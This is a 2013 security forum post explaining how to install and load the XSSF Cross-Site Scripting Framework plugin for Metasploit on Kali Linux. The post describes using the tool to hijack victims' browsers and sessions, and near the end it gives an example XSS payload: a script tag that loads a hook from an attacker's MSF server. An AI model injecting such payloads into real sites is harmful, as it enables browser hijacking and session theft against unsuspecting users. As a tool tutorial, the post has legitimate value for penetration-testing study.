Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Mayk0 en Junio 15, 2013, 02:52:51 PM

Título: Xssf Metasploit Plugin
Publicado por: Mayk0 en Junio 15, 2013, 02:52:51 PM
http://www.youtube.com/watch?v=soNCw0FnPVU (http://[youtube)


[ Install XSSF metasploit plugin ]
'this tutorial will focus on installing/using xssf on kali-linux distros'

(http://www.thriftstorehacker.com/2012/october/xssf-web-console.png)

Description:
The Cross-Site Scripting Framework (XSSF) is a security tool designed to turn the XSS vulnerability exploitation
task into a much easier work. XSSF allows creating a communication channel with the targeted browser
(from a XSS vulnerability) in order to perform further attacks, its integration into the Metasploit Framework
allows users to launch MSF browser based exploit easilly from an XSS vulnerability,In addition, an interesting
though exploiting an XSS inside a victim's browser could be to browse website on attacker's browser,
using the connected victim's session. In most of cases, simply stealing the victim cookie will be sufficient
to realize this action... 'this tool requires metasploit installed to work'




Installation instructions:
1 - Download the latest Metasploit Framework (MSF) release
2 - Update Ruby to 1.9 if not already done
3 - open terminal and navigate to [ /opt/metasploit/../msf3 ] folder
4 - Download XSSF using SVN repository
[ svn export http://xssf.googlecode.com/svn/trunk ./ --force ]


XSSF plugin loading instructions:
1 - Start Metasploit Framework (MSF Console for example)
2 - Load XSSF plugin using the command 'load xssf'
3 - XSSF server port can be modified using the command 'load xssf Port=80'
4 - XSSF server URI can be changed using the command 'load xssf Uri=/'
5 - Example of XSS Attack: <script src="http://IP-Server-MSF:Port/loop?interval=5"></script>


XSSF home:
[ https://code.google.com/p/xssf/ ]
Source Cod:
[ https://code.google.com/p/xssf/source/browse/trunk/modules/?r=5#modules%2Fauxiliary%2Fxssf ]